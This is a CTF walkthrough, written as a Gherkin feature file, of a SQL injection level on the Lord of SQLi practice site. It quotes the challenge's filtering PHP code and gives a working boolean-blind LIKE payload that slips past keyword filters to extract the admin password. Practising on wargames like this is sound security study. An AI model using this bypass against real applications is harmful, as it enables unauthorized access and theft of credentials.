## Version 2.0
## language: en

Feature: darkknight-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_darkknight where id='guest' and pw='' and no=
    """
  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
      DARKKNIGHT Clear!
    """
    When I try with the well known payload:
    """
      ?pw=a&no=123 or id like "admin"
    """
    Then I get nothing
    But I don't solve it

   Scenario: Success:Sqli-boolean-exploitation
    Given that I inspected the code
    And I see that they validate "ascii/substr/=/'" clauses
    And also to pass the challenge I need the actual admin password
    """
    if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
    if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
    $_GET[pw] = addslashes($_GET[pw]);
    $query = "select pw from prob_darkknight where id='admin' \
    and pw='{$_GET[pw]}'";
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
    """
    Then I used the following to bypass the protections
    And to iterate through characters to get the admin password
    """
    ?pw=1&no=123 or (id like "admin" and pw like "a%")
    """
    Then I created a python script to find it using like [exploit.py]
    And I get the admin password
    Then I solve the challenge
